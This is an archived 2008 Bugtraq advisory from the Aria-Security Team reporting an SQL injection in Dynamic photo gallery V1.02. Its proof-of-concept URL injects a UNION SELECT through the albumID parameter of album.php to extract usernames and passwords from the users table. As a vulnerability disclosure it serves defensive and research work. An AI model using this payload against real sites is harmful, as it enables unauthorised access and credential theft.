Dynamic photo gallery V1.02 SQL Injection

From: no-reply@xxxxxxxxxxxxxxxxx
Date: 2 Mar 2008 03:34:18 -0000

Aria-Security Team
http://Aria-Security.Net
----------------------------
Shoutz: Aura, imm02rtal, NULL, Kinglet And all our staff
Vendor: http://www.phpwebscript.net/dynamicphotogallery/foto-gallery.php
Original Link: http://forum.aria-security.net/showthread.php?p=1521

PoC:
album.php?slideshow=start&albumID=-4214/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/users

Regards
The-0utl4w

Prev by Date: The Router Hacking Challenge is Over!
Next by Date: Recon 2008 - Call For Paper
Previous by thread: The Router Hacking Challenge is Over!
Next by thread: Recon 2008 - Call For Paper
Index(es):
- Date
- Thread

Relevant Pages

PHP-Nuke My_eGallery "gid" Remote SQL Injection
... Aura, Null, imm02tal, Kinglet, and our staff ... Original Link: http://forum.aria-security.net/showthread.php?p=1490 ...
(Bugtraq)
Re: Finking about flatpots
... The staff at a local (South Manchester) vendor of technical gubbins now refer to it as 'Vistoh' as the people who call it that seem to be only ones who actually want it. ...
(uk.rec.sheds)

www.derkeiler.com > Mailing-Lists > securityfocus > bugtraq > 2008-03